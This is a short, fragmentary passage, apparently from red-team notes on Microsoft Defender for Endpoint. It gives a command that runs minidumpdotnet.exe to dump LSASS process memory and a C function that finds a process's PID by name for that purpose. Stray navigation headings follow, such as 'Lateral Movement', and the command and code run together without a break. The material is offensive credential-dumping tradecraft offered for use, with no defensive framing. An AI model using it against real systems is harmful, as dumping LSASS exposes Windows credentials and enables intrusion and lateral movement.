MDE
LSASS Dump
.\minidumpdotnet.exe <lsass-PID> <dump-output-path>int FindPID(const char* procname) {
int pid = 0;
PROCESSENTRY32 proc = {};
proc.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
bool bProc = Process32First(snapshot, &proc);
while (bProc) {
if (strcmp(procname, proc.szExeFile) == 0) {
pid = proc.th32ProcessID;
break;
}
bProc = Process32Next(snapshot, &proc);
}
return pid;
}File Transfers
Detection Chains
Lateral Movement
Example
Last updated